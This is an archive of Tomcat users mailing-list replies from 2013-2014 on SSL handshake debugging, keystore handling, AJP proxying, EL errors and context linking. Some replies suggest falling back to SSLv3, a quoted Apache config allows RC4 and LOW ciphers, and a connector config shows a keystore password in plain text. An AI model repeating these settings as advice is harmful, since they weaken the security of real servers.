 Thanks in advance.
 
 Chinmoy
  

RE: detailed APR/SSL logging

[Martin Gainty]

  


 Date: Tue, 7 Jan 2014 14:51:21 +0500
 Subject: detailed APR/SSL logging
 From: sanaulla...@gmail.com
 To: users@tomcat.apache.org
 
 Hi,
 
 Anyone knows, how do i can get the detailed APR/SSL debug logs. i need to
 know where my SSL session is getting broken? there is nothing in the
 catalina.out log.
 
 usage: java org.apache.catalina.startup.Catalina [ -config {pathname} ] [
 -nonaming ] { -help | start | stop }
 Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener init
 INFO: Loaded APR based Apache Tomcat Native library 1.1.29 using APR
 version 1.5.1.
 Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener init
 INFO: APR capabilities: IPv6 [true], sendfile [true], accept filters
 [false], random [true].
 Jan 07, 2014 1:43:12 AM org.apache.catalina.core.AprLifecycleListener
 initializeSSL
 INFO: OpenSSL successfully initialized (OpenSSL 1.0.1e 11 Feb 2013)
 Jan 07, 2014 1:43:12 AM org.apache.coyote.AbstractProtocol init
 INFO: Initializing ProtocolHandler [http-apr-8080]
 Jan 07, 2014 1:43:12 AM org.apache.coyote.AbstractProtocol init
 INFO: Initializing ProtocolHandler [http-apr-0.0.0.0-8443]
 Jan 07, 2014 1:43:12 AM org.apache.catalina.startup.Catalina load
 INFO: Initialization processed in 696 ms
 Jan 07, 2014 1:43:12 AM org.apache.catalina.core.StandardService
 startInternal
 INFO: Starting service Catalina
 Jan 07, 2014 1:43:12 AM org.apache.catalina.core.StandardEngine
 startInternal
 INFO: Starting Servlet Engine: Apache Tomcat/7.0.47
 Jan 07, 2014 1:43:12 AM org.apache.catalina.startup.HostConfig
 deployDirectory
 INFO: Deploying web application directory
 /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/docs
 Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig
 deployDirectory
 INFO: Deploying web application directory
 /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/manager
 Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig
 deployDirectory
 INFO: Deploying web application directory
 /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/ROOT
 Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig
 deployDirectory
 INFO: Deploying web application directory
 /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/host-manager
 Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.HostConfig
 deployDirectory
 INFO: Deploying web application directory
 /opt/tomcat/apache-tomcat-7.0.47-src/output/build/webapps/examples
 Jan 07, 2014 1:43:13 AM org.apache.coyote.AbstractProtocol start
 INFO: Starting ProtocolHandler [http-apr-8080]
 Jan 07, 2014 1:43:13 AM org.apache.coyote.AbstractProtocol start
 INFO: Starting ProtocolHandler [http-apr-0.0.0.0-8443]
 Jan 07, 2014 1:43:13 AM org.apache.catalina.startup.Catalina start
 INFO: Server startup in 935 ms
 
 
 --
 Server looks up properly with openssl and certs but when i try to connect
 it with openssl s_client its getting error
 --
 root@ubuntu:/home/san/certs/pay-test# openssl s_client -connect
 127.0.0.1:8443 -tls1_2 -debug
 CONNECTED(0003)
 write to 0x8a03258 [0x8a0cfe3] (319 bytes = 319 (0x13F))
  - 16 03 01 01 3a 01 00 01-36 03 03 52 cb cd f1 45 :...6..R...E
 0010 - e9 1b fc 26 6f d9 b3 c7-90 58 88 80 92 eb 3f 57 ...oX?W
 0020 - ab 9f be 49 2d 52 b4 1f-f1 c1 d6 00 00 9e c0 30 ...I-R.0
 0030 - c0 2c c0 28 c0 24 c0 14-c0 0a c0 22 c0 21 00 a3 .,.(.$..!..
 0040 - 00 9f 00 6b 00 6a 00 39-00 38 00 88 00 87 c0 32 ...k.j.9.8.2
 0050 - c0 2e c0 2a c0 26 c0 0f-c0 05 00 9d 00 3d 00 35 ...*=.5
 0060 - 00 84 c0 12 c0 08 c0 1c-c0 1b 00 16 00 13 c0 0d 
 0070 - c0 03 00 0a c0 2f c0 2b-c0 27 c0 23 c0 13 c0 09 ./.+.'.#
 0080 - c0 1f c0 1e 00 a2 00 9e-00 67 00 40 00 33 00 32 .g.@.3.2
 0090 - 00 9a 00 99 00 45 00 44-c0 31 c0 2d c0 29 c0 25 .E.D.1.-.).%
 00a0 - c0 0e c0 04 00 9c 00 3c-00 2f 00 96 00 41 c0 11 /...A..
 00b0 - c0 07 c0 0c c0 02 00 05-00 04 00 15 00 12 00 09 
 00c0 - 00 14 00 11 00 08 00 06-00 03 00 ff 01 00 00 6f ...o
 00d0 - 00 0b 00 04 03 00 01 02-00 0a 00 34 00 32 00 0e ...4.2..
 00e0 - 00 0d 00 19 00 0b 00 0c-00 18 00 09 00 0a 00 16 
 00f0 - 00 17 00 08 00 06 00 07-00 14 00 15 00 04 00 05 
 0100 - 00 12 00 13 00 01 00 02-00 03 00 0f 00 10 00 11 
 0110 - 00 23 00 00 00 0d 00 22-00 20 06 01 06 02 06 03 .#.. ..
 0120 - 05 01 05 02 05 03 04 01-04 02 04 03 03 01 03 02 
 0130 - 03 03 02 01 02 02 02 03-01 01 00 0f 00 01 01 ...
 read from 0x8a03258 [0x8a08a93] (5 bytes = 5 (0x5))
  - 15 03 03 00 02 .
 read from 0x8a03258 [0x8a08a98] (2 bytes = 2 (0x2))
  - 02 28 .(
 3074095420:error:14094410:SSL 

RE: Problem configuring SSL

[Martin Gainty]

  


 Date: Tue, 7 Jan 2014 14:41:15 -0500
 Subject: Re: Problem configuring SSL
 From: a-ko...@northwestern.edu
 To: users@tomcat.apache.org
 
 Gentlemen, thanks a lot for your help. I figured out what the problem was.
 It was not related to tomcat configuration, but to my keystore. The reason
 is that once you import a client certificate under the same alias as the
 private pair, they both get merged under the same alias inside keystore.
 Using keytool -delete command, meant to remove the certificate only,
 deletes the private pair as well. I noticed that once I dumped keystore
 content for my keystore and a keystore on one of my other servers. Luckily,
 I had a backup of the keystore I made right after it was created. Importing
 the certificates into that keystore resolved the issue.

MGI *hope* you enabled at least ONE cipher for SSL Connector
MGUsually the big players (Versign/Thawte) will provide valid CA cert/valid 
key in the supplied pfx
MGglad to hear that worked for you
 
 
 On Sun, Jan 5, 2014 at 3:59 PM, Christopher Schultz 
 ch...@christopherschultz.net wrote:
 
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
 
  Alex,
 
  On 1/5/14, 12:30 PM, Alex Kogan wrote:
   I have a strange problem configuring SSL to work with Tomcat.
   Environment: Tomcat 7.0.42 CentOS 5.10 Java 1.7.0_45
  
   It's a new Tomcat installation. All keystore operations were done
   with keytool. I imported CA root/intermediate certificate and
   client certificate, configured SSL connector in server.xml. I have
   this same setup on another server that works fine. Connecting to
   this server via http works.
  
   1. If I try to connect this address via https in Chrome I get:
   This Webpage is not available. In Firefox: Error code:
   ssl_error_no_cypher_overlap
 
  Sounds familiar.
 
  Please post your Connector configuration(s) from your server.xml
  file. Remember to remove any sensitive information from the configuration.
 
  Also please post all of the startup messages from Tomcat's
  logs/catalina.out file: we need to see the versions of various things
  and what components (if any) suffer problems starting up.
 
   3. Here's a list of enabled ciphers using SSLInfo:
  
   #java -showversion SSLInfo
 
  Nice to see someone is getting some use out of that. ;)
 
  - -chris
  -BEGIN PGP SIGNATURE-
  Version: GnuPG v1
  Comment: GPGTools - http://gpgtools.org
  Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
  iQIcBAEBCAAGBQJSycfKAAoJEBzwKT+lPKRYBz0P/jDoaW+t7Zi1dCRp3zz/o1PS
  JXx0Pa61SkXQN4TgQFSyZ6seO1+IJjh1X1txiS81GOL3HZQCwZ9qbDfjOOKitynZ
  +d9Ky5R0UGUmG3/479ZFAIGfy8RXwtMJvoCpFo5dRA+ihevOzgzngGNzMdDm2KgC
  f8ZWIAue+9Hq9o0CBrjDxdYheyOgFbICzvC4YR/s5poxz3BhpGXNQVWyViyJzIo6
  bn7uLzSqaGeCtemMJeXgPJ27lNh5SnXRjUfUr9dvGF/QNrXTSYmoDlfgHSuzWCl8
  m18VrWdC8a76aQ0YW+0cIlX5TLDuQhBqsuVxNja+0GY2IP5+RBaF5LAsJ9sdTnBE
  /enlA8vvzYD8jZBGMvCkPAi7ZvG/amI6xw+QlaYeYTDqDfPUrM1ERZItg7l1fjaD
  SBVKaPCvtHN/IXVTDqDPfPS4v34yR+/MVwOFdiuagh3cRd/wt/WxbFC8jTFsktKB
  Yc87eh4Bwc24P6Kc74/l2+8LDFzwLGwSEGGm2c2h9fDu6OKbtF23B887ZsveWjyu
  RTlKcgsv8LzQi7SmnRH4S7A8KdfEv3Fh1rqLDbwzjaidoaHlDa/Rqo6zfBovCkiH
  4z/QmVpI6sOh6IoULBxhOeqaubTvAvnErRTPeTSx5XPvJB9FwNHwGRwG6F+F3mV+
  VCpWYwQ3I2qGEm5RBvbh
  =9FS1
  -END PGP SIGNATURE-
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
 
 
 -- 
 Software Engineer
 Department of Psychiatry and Behavioral Sciences
 Northwestern University
 
 a-ko...@northwestern.edu
  

RE: expired crl file

[Martin Gainty]

 Date: Sat, 4 Jan 2014 09:18:22 +0100
 Subject: expired crl file
 From: jjaku...@gmail.com
 To: users@tomcat.apache.org
 
 When I place expired crl file tomcat starts without any visible stack trace
 in logs,
 but I cannot login with valid certificates.
MG

$CATALINA_HOME/conf/setevnv.sh

# Uncomment the next line to print SSL debug trace in catalina.out
#CATALINA_OPTS=$CATALINA_OPTS -Djavax.net.debug=ssl
 MG 

 
 Is there any solution for this feature?
 
 BTW, how can I check validity/expiration date of crl file ?
 
 Regards
 Jakub

MGHodne zdaru
MGMartin-
  

RE: Symantec SSL cert in tomcat 6

[Martin Gainty]

MGOngnjen
 Gene,
 
 On 3.1.2014 14:55, Gene Matthews wrote:
  Thie symantec instructions say to ensure the alias for the ssl cert has an 
  Entry Type of PrivateKeyEntry.  Mine DOES NOT.  Instructions say if it does 
  not, to please import the certificate in the “Private Key” alias.
 
 With JKS keystore you must keep private key and certificates in the same 
 keystore.
MGSince A pfx that Verisign provides contains key and cert
MGWindows servers use .pfx files to contain the public key files (your SSL
 Certificate files, provided by DigiCert) and MGthe associated private key
 file (generated by your server as part of the CSR).

MGperhaps you are referring to the key/certificate combination in pfx?

 Therefore, you shouldn't import server certificate and inter. 
 certificates into brand new keystore, but into the old keystore -- the 
 one you used to create key pair, and to generate CSR.
MGCSR is the request to CA Authority (verisign ) to sign (digitally identify) 
this certificate 
MG certificate signing request (also CSR or certification request) is a 
message sent from an applicant to a MGcertificate authority in order to apply 
for a digital identity certificate. The most common format for CSRs is the 
MGPKCS#10 specification
MG
 
 I find it strange that Symantec/Verisign didn't mention that explicitly 
 in their documentation.
MGagreed
 
  It also says to ensure the Certificate chain length is 4.
 
 Once you import certificates into the right keystore, check that again.
 
 
  PS:  How does one search the archives of this list?  When I browse the 
  archive site I don’t see a search field anywhere.  So I’ve been googling 
  without coming up with a solution. it is probably out there but I don’t 
  know enough to recognize it :-(
 
 http://tomcat.apache.org/lists.html
 
 Search for Archives.
 
 -Ognjen
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Java to JavaScript RMI framework available.

[Martin Gainty]

Johann-
 
If your design supports Comet, Polling or Piggyback you *may* to take a look at 
Joe Walker's DWR..(Direct Web Remoting)

http://directwebremoting.org/dwr/index.html

*Mit freundlichen grüßen*
Martin --


  



 Date: Thu, 2 Jan 2014 15:54:01 -0800
 Subject: Re: Java to JavaScript RMI framework available.
 From: igor.uris...@gmail.com
 To: users@tomcat.apache.org
 
 Johan,
 
 
 On Thu, Jan 2, 2014 at 1:25 AM, Johan Compagner jcompag...@servoy.comwrote:
 
  does it also do the other way around?
  So also having the endpoint on the server that has methods that can be
  called from javascript in a very easy way?
 
 
  It doesn't. There is already a mechanism that sits above simple message
 passing, for calling into
 the server: XMLHttpRequest, aka AJAX. Competing with that would have taken
 more thought and
 effort that so far I have been able to put into FERMI. I imagine that if
 this gets some acceptance,
 offering a fully symmetric RMI may become a viable idea. Not on the
 immediate roadmap, though.
 -Igor.
 
 
 
  On 31 December 2013 01:55, Igor Urisman igor.uris...@gmail.com wrote:
 
   Folks,
  
   I needed to write this for something I am working on and thought there
   might be a wider audience for it.
   Tomcat 8 supports standard compliant Websockets, which provide convenient
   asynchronous full-duplex
   server to client data transport. The framework I am offering builds on
  top
   of that a feature rich remote
   method invocation paradigm. Please check it out.
  
   https://github.com/iurisman/FERMI
   Apache 2.0 license.
  
   Happy coding.
   Igor.
  
 
 
 
  --
  Johan Compagner
  Servoy
 
  

RE: Start the Tomcat server in the server view and go to http://localhost:8080/

[Martin Gainty]

Frank 

 

Context Path / is mapped to 'ROOT'


create ROOT.WAR
uncompress ROOT.WAR to $CATALINA_HOME/webapps/ROOT 
then the first and only webapp you see when you go to

http://localhost:8080


will be  root.war

 

http://www.coderanch.com/t/424290/Tomcat/deploy-Root-Tomcat-Website

Buona Fortuna!
Martin --





 


Per favore non modificare o interrompere questa trasmissione
  



 From: frank.luga...@amdocs.com
 To: users@tomcat.apache.org
 Subject: Start the Tomcat server in the server view and go to 
 http://localhost:8080/
 Date: Fri, 27 Dec 2013 19:51:26 +
 
 Hi All,
 I have a very simple question but seems I cant find this optiontried to 
 google several times,!Can someone please tell me how to Start the Tomcat 
 server in the server view and go to http://localhost:8080/?
 Thank you
 ~Frank
 
 This message and the information contained herein is proprietary and 
 confidential and subject to the Amdocs policy statement,
 you may review at http://www.amdocs.com/email_disclaimer.asp
  

RE: V 7 047 windows x64

[Martin Gainty]

  


 Date: Thu, 26 Dec 2013 21:24:27 +0100
 Subject: Re: V 7 047 windows x64
 From: jbmo...@gmail.com
 To: users@tomcat.apache.org
 
 I was testing the EL in a .jsp file under Eclipse Kepler.
 Now I copied the project files under c:\tomcat7\webapps and recompiled the
 java sources.
 And the EL works!
 So the EL problems are in the Eclipse Kepler setup.
MGthen you should contact the support staff at Eclipse to let them know of 
this significant bug in Kepler 

 Many thanks for your reply.
 Jean
 
 
 On Thu, Dec 26, 2013 at 3:16 PM, André Warnier a...@ice-sa.com wrote:
 
  JB MORLA wrote:
 
  Hi,
 
  I can't use EL in .jsp files.
  I have searched the web and sintalled jasper-el.jar and javaee-api 7 0 in
  the \lib directory,
  but I keep getting the ELResolver error.
 
  Hi.
  You would have a much higher probability of getting useful and quick help,
  if you pasted the original corresponding Tomcat error log lines in your
  message, like here :
 
 
 
 
  (Note: really do a cut-and-paste directly in your mail message to the
  list. Do not attach the error log as attachment. This list strips most
  attachments).
 
 
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
  

RE: EOFException in AjpNioProcessor

[Martin Gainty]

  


 Subject: Re: EOFException in AjpNioProcessor
 From: jsb_tom...@360works.com
 Date: Sat, 21 Dec 2013 16:58:07 -0500
 To: users@tomcat.apache.org
 
 On Dec 18, 2013, at 1:40 PM, André Warnier a...@ice-sa.com wrote:
 
  Jesse Barnum wrote:
  On Dec 18, 2013, at 12:27 PM, Jesse Barnum jsb_tom...@360works.com wrote:
  I'm seeing this error a lot in my log files. It happens when I am trying 
  to read from the request InputStream. Should I be concerned about this, 
  or is it just the equivalent of the user clicking 'stop' in their browser?
  
  SEVERE: An error occurred while handling request 
  /WSMRegister/LicenseCheck/handshake
  java.io.EOFException
  Forgot to mention, I'm running version 7.0.35 on Ubuntu Linux on Amazon 
  EC2.
  
  Well, it seems that you have the explanation right there.
  If com.prosc.licensecheck.LicenseCheck.doPost is your code, then that's 
  where the problem is : you are trying to read from the request input 
  stream, when there is no more data to read and you have already seen it's 
  EOF.
  Why there is no more data to read is another question, and it could be that 
  the client did something wrong. But the code in those classes who do the 
  read, obviously is not coping well with that case.
  
 
 Yes, com.prosc.licensecheck.ListCheck.doPost is my code. It would not be hard 
 to catch the exception there and ignore it.
 
 I guess another way to phrase the question is, what would cause a 
 java.io.EOFException to get thrown? I don't want to ignore it if it's trying 
 to tell me something important.
 
 I am used to seeing ClientAbortException: java.net.SocketException: Broken 
 pipe. 
MGError in Transport..your apache or tomcat  servers(or one of intervening 
routers) is unable to complete the transmission
Is the EOFException basically the same thing?
MGAs andre said There is no more data from Request
 
 My concern is that there might be some misconfiguration between the Apache 
front end and the Tomcat NIO connector that might be causing it.
MG..possibly...lets take a look..

 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Exception in CoyoteAdapter class

[Martin Gainty]

Señor AT

Martínpuerto y el protocolo tienen que estar de acuerdo con la configuración 
del conector AJP en tomcat server.xml
MartínEl puerto debe ser 8009
MartínHabilitar el protocolo TLS (pero no SSLv2)
 
http://www.zeitoun.net/articles/configure-mod_proxy_ajp-with-tomcat/start

MartínSaludos Cordiales desde Dorchester MA
  


 From: at.s...@everis.com
 To: users@tomcat.apache.org
 Subject: RE: Exception in CoyoteAdapter class
 Date: Fri, 20 Dec 2013 08:30:19 +
 
 Hi,
 
 We are concerned about the issues we found some weeks ago, do you have any 
 suggestions about it?
 
 
 Best Regards,
 AT
 
 -Mensaje original-
 De: Christopher Schultz [mailto:ch...@christopherschultz.net] 
 Enviado el: lunes, 09 de diciembre de 2013 22:51
 Para: Tomcat Users List
 Asunto: Re: Exception in CoyoteAdapter class
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256
 
 AT,
 
 On 12/9/13, 6:43 AM, at.silk wrote:
  2. What is in front of Tomcat? An Apache HTTPD server? - Right.
  
  Is Apache HTTPD accessed via HTTPS? - Right, via HTTPS
  
  How mod_jk is configured there? Is mod_jk configured to pass 
  SSL_SESSION_ID to Tomcat?
  
  AT: This is our configuration: AllowCONNECT 443 SSLEngine on 
  SSLProxyEngine on SSLProxyVerify none SSLOptions +StdEnvVars
  +ExportCertData SSLProtocol all -SSLv2 SSLCipherSuite
  ALL:!ADH:!EXPORT:!SSLv2:RC4+RSA:+HIGH:+MEDIUM:+LOW
  SSLCertificateFile xxx.crt SSLCertificateKeyFile xxx.key 
  ProxyPass / ajp://localhost:8010/ connectiontimeout=3600
  timeout=3600 ProxyPassReverse / ajp://localhost:8010/
 
 Note a note: this is a mod_proxy_ajp configuration, not a mod_jk one.
 I know that mod_jk uses SSLOptions +StdEnvVars to pass the SSL session id to 
 Tomcat, but I'm sorry, I don't know about mod_proxy_ajp. I can imagine that 
 it would operate in a similar way, but the mod_proxy_ajp documentation isn't 
 as forthcoming as the mod_jk documentation.
 
 - -chris
 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.4.15 (Darwin)
 Comment: GPGTools - http://gpgtools.org
 Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
 iQIcBAEBCAAGBQJSpjtYAAoJEBzwKT+lPKRYbp4P/3xElIVs2K47Y/+ppay3Np/7
 TyhYLXIdgUAvapRy6p8KC8okiAxgteNkPPtwxywQqR/LkM0mHeFtN3OFJe1MHl0D
 qJ3ZoyYEKbe+4bGuUm/SLX7YswSO+0nTsf9OGmi2XVZyCXff0faxZFSZ2N1hW+0y
 4+J1eLcG+yHAkaN9JSsSHYx+M9hKoMz4ZXIohnB1zfvD1iroSoBpPPlbdl0BXBaa
 /b6yNjFfpgqxojiCdP8/eA2/Tdd5+p9aNwUWAYiq3vMME6+oDuYMghQifK1pIbzP
 ezgF4/IObA8y1Zhavnw2hA3ZjtNcXauzSmF9iTxlDQaEhjVeiAtwAv+yrXyhQB6/
 J1pc/1DpVTsA+7j/JEGKhpna8W0G6aJc7iIFoqu5g36bHEoZbNDlnLZDE2kZrSda
 q1zjIklRhmiA1lEqh8tW4N1ushBgkJpQp2PZx5ZNqsvbrr3djbFHSkXUKgus3VsS
 czdD7vuhGsHX8ER/c3/KD59TF7IDUcjluJWyQRhoc2P+S0xTtDMTHDLvx4WXwLm1
 ZU3+pzR/MAoCI0kesq5NxR4lewyT3n9MW3nD62sO1h9ieqoOuhQ8eRqxSpBTsZZH
 Sy+GorGhXiZmdr02llagtHrdiexrY84oPzTioIPkQ8/C9TlR7zDaxpPE39HjILkd
 r8ajstixh1CbE3sC2h1C
 =hEow
 -END PGP SIGNATURE-
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
 B�CB��[��X��ܚX�KK[XZ[�\�\��][��X��ܚX�P�X�]
  �\X�K�ܙ�B��܈Y][ۘ[��[X[��K[XZ[�\�\��Z[�X�] �\X�K�ܙ�B�
  

RE: ssl_error_internal_error_alert in tomcat 7‏

[Martin Gainty]

  


 Date: Thu, 19 Dec 2013 15:41:13 -0500
 From: ch...@christopherschultz.net
 To: users@tomcat.apache.org
 Subject: Re: ssl_error_internal_error_alert in tomcat 7‏
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256
 
 Jaya,
 
 On 12/19/13, 2:54 PM, jaya ravindran wrote:
  I am getting SSL error in firefox when connecting to tomcat
  server. Apache Tomcat Version 7.0.22 using JSSE configuration
 
 You should really upgrade from your 2-year-old version. Tomcat 7 is on
 version 7.0.47 these days. It's possible something has been fixed.
 
  java version 1.6.0_41 using 64 bit . IE and Chrome works fine
  although I can see the following message in Chrome . The connection
  users SSL 3.0 When I edit firefox and set
  security.tls.version.max=0, I can get connection. My ssl config is
  below.
MGsecurity.tls.version.min = 0 (SSL 3.0); 

 
 Do you have any non-default setting for security.enable_ssl3 or
 security.enable_tls?
 
  Can anyone suggest some possible reasons for this error?
  
  Connector port=8443 
  protocol=org.apache.coyote.http11.Http11Protocol 
  SSLEnabled=true scheme=https secure=true clientAuth=false 
  sslProtocol=TLS keystoreFile=my.keystore 
MGsslProtocol=SSLv3
 
  keystorePass=acdfv123 truststoreFile=my.keystore 
  truststorePass=acdfv123 connectionTimeout=2 
  redirectPort=18443 maxThreads=150 maxSpareThreads=75 
  enableLookups=false acceptCount=100 
  disableUploadTimeout=true URIEncoding=UTF-8 server=Apache /
 
 Can you try using OpenSSL's s_client with various options (for TLS
 protocol) to see which ones do and do not work?
 
 - -chris
 
MGhttps://support.mozilla.org/en-US/questions/963325

 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.4.15 (Darwin)
 Comment: GPGTools - http://gpgtools.org
 Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
 iQIcBAEBCAAGBQJSs1nnAAoJEBzwKT+lPKRYjaUP/2wwh/XACKSsPtFViWxz+78m
 aXOos8dB60Sx8czBsFfDsIzFfBdvCOEzmLl5ZlOUi7EyV8F+qwh6mG/x73vUIdrb
 LcLQlrYUJaDg8XXHMSRa5icATBE3sZQVITgDUUkF1dp0uyUoQmE/HLnZ3HZfIOA3
 UQbHb/f7N5CHpb9LQ82YUlSRZ6v+feqsBEg0BPg4tf1x9eHEcf6xPUu6sCdzcdXC
 01cpS2/5v8hyo2QmeG6shM+JBJoFAFKLisJrhVuSmFUMWLxqt9MykGlvkf/sfZIQ
 klSuCbQ74dxYS5OhcP3ipqD3nb7t3C93qRSZBqSGI8PZtWntwEZqTrR+obTxB3CZ
 H/nzKCupV+9s1NrHNO8q6fQ0UCrPCucwJS6WM9nIEczu5miMxpdb+mj8Qmj6dpYn
 3b4IeLn4qfAk9FNGHuiiL4y87uMkR2+617+2L3VI2f/N/E2Y4bf0zeb7Du5UhuGn
 FxXLRjaNDIPj1yeJHqz7DiuArSv9eZwG1xWAWfBQIVwux+Vm4OCgjph52vGYp2n1
 Y7Iht9/xb1qVxw1KUVeU+qevTszBYnf9V2UM6LPxBzZQwuBkXhZwOYIdRPC/CVn6
 +U4+xf2/3IDpale2eO/453+0f2Zy7aApPKXPvgoAcy68jYBbxuSpL0gEQk1BIGhV
 y94bWDTJiTu9AIy0tiyj
 =KaW9
 -END PGP SIGNATURE-
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: linking (limiting???)

[Martin Gainty]

  


 Date: Sun, 15 Dec 2013 12:41:55 -0800
 From: its_toas...@yahoo.com
 To: users@tomcat.apache.org
 Subject: Re: linking (limiting???)
 
 On 12/15/2013 8:34 AM, Ray Holme wrote:
  I am a Linux user and love linking things to reduce copies.
 
  Apache/Tomcat (by default) does not allow symbolic linking (nice as
  it can cross mounted file systems) except in the top apache/lib
  directory. I use hard links in the Application/WEB-INF/lib
  directories to reduce copying and help me manage things.
 
  HOWEVER, some applications have special needs - e.g. pictures. You
  don't want to always distribute these with the release of the
  application (Application.war file), so symbolic links are the way to
  go (except for MS land, sorry). The nice solution to this is:
  .../webapps/Application/WEB-INF/context.xml which must contain at
  least the two below lines:
 
  ?xml version=1.0 encoding=UTF-8? Context allowLinking=true
  /Context
 
 
  However this allows ALL symbolic linking in the Application
  directory. I agree with the developers that this is dangerous.
 
  Is there some way to allow linking in just ONE sub-directory of the
  Application?? - e.g.
 
  .../webapps/Application/images
 
  This would allow all I need to have local images for the application
  without endangering other things using a symbolic link.
 
 
 If you use Tomcat 7, read the following:
 
 http://tomcat.apache.org/tomcat-7.0-doc/config/context.html#Resource_Definitions

MG...Mark I assume you're referring to Virtual DirContext...?
Context path=/mywebapp docBase=/Users/theuser/mywebapp/src/main/webapp  
Resources className=org.apache.naming.resources.VirtualDirContext 

extraResourcePaths=/WEB-INF/classes=/Users/theuser/mywebapp/target/classes,/pictures=/Users/theuser/mypictures,/movies=/Users/theuser/mymovies/
MG

 . . . just my two cents
 /mde/
MGThanks Mark, 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Transfer-Encoding: chunked not working

[Martin Gainty]

chunked only works on HTTP 1.1 connections
display $CATALINA_HOME/conf/server.xml

Martin-- 


  


 Date: Tue, 3 Dec 2013 15:55:22 -0800
 Subject: Transfer-Encoding: chunked not working
 From: cbman...@gmail.com
 To: users@tomcat.apache.org
 
 Tomcat 7.0.47, OSX 10.8. Fresh install via homebrew. I'm running a web app
 with Tomcat that is returning the header Transfer-Encoding: chunked and
 seemingly exactly one 16384-byte chunk of content that is longer than that.
 Consequently the page that should be transferred is not rendered by the
 user agent (Chrome in this case). AFAICT it's Tomcat that isn't sending all
 the chunks properly. Why might it not be doing that? What else might be the
 problem?
 
 -- 
 C. Benson Manica
 cbman...@gmail.com
  

RE: Same realm for three different countries

[Martin Gainty]

$CATALINA_HOME/srcgrep -S -l locale *Realm*.*
---Nichts---

 

Im going to take agree with Chris

2 options:
1)Make a 'Enhancement Request' to introduce localisation parameter for 
JDBCRealm 
2)code the localisation parameter into CustomRealm yourself and submit a patch

 

http://tomcat.apache.org/bugreport.html#How_to_submit_patches_and_enhancement_requests

 

Viel Gluck!
Martin  
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.

Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

  


 Date: Mon, 2 Dec 2013 23:40:59 +0100
 Subject: Re: Same realm for three different countries
 From: stefan.a.f...@gmail.com
 To: users@tomcat.apache.org
 
 do you see a entry point where to start ?
 i already have a customRealm
 
 2013/12/2 Christopher Schultz ch...@christopherschultz.net:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
 
  Stefani,
 
  On 12/2/13, 2:23 PM, Stefan Frei wrote:
  tomcat 7.0.42
 
  debian
 
  I have the same webapplication responsible for providing services
  fro three different countries.
 
  Therefore 3 slightly different database schemes exist on my mysql
  instance.
 
  one for ch(switzerland), one for de(germany) and one for
  at(austria).
 
  now my auth-realm which extends RealmBase should be able to decide
  to which schema to connect to, depending on the requested url.
 
  for example requests to webapp.ch should use the table users in
  schema ch.
 
  how am i able to read out httprequest or session in the realm to
  identify for which country the request is destined?
 
  The short answer is that you can't, at least with Tomcat's stock Realm
  implementations.
 
  You can hack your own Realm, but you'll also need to hack around a bit
  more, since the Realm itself doesn't get any access to the servlet
  request information.
 
  - -chris
  -BEGIN PGP SIGNATURE-
  Version: GnuPG v1.4.15 (Darwin)
  Comment: GPGTools - http://gpgtools.org
  Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
 
  iQIcBAEBCAAGBQJSnQpPAAoJEBzwKT+lPKRYOV0QAJ0ZkCM4eFRrEOX5dbJyXgYK
  evyIEKju8jd6N3rbOfWx3XKua0Nau0H18Yb6gCrQc94OGyHTJFP1gfPkDL4eTaHu
  FXQJvWgrNUjHHifXaNmcATef6GeHhchSply6KbP0s8uYjINgS3eGCUJmk6mS0ZU+
  W7VMIXE184kaQcOYJ6OIFwFhGkEuMEajRa7iGkWxQYxhi9VCXgb8a0hZ9uLO00rm
  Nt/J54G2aE32UTNhEti0sBIwJC9pnddsV9WWv84jSBN/FhKNf5fHc7CskpB9wRGR
